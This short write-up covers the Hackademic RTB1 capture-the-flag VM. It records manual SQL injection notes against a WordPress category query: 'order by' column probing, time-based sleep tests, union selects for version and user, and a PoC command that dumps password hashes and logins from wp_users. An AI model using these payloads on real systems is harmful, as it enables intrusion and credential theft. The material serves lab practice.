Hackademic RTB1 (Manual SQLi)

This is the first realistic hackademic challenge (root this box) by mr.pr0n Download the target and get root. After all, try to read the contents of the file 'key.txt' in the root directory. Enjoy!

Hackademic RTB1 VM Download

The PoC that i wrote for automating the SQL injection can be found Here

Walkthrough Video

Notes' order by 1 order by 2 order by 3 order by 4 order by 5 order by 6

WordPress database error: [Unknown column '6' in 'order clause']
SELECT * FROM wp_categories WHERE cat_ID = 1 order by 6 LIMIT 1 and sleep(0) and sleep(5) and sleep(0) union select 1,2,3,4,5 and sleep(0) union select 1,version(),3,4,5 and sleep(0) union select 1,user(),3,4,5

./poc.py 'group_concat(id,0x20,user_pass,0x20,user_login) from wp_users'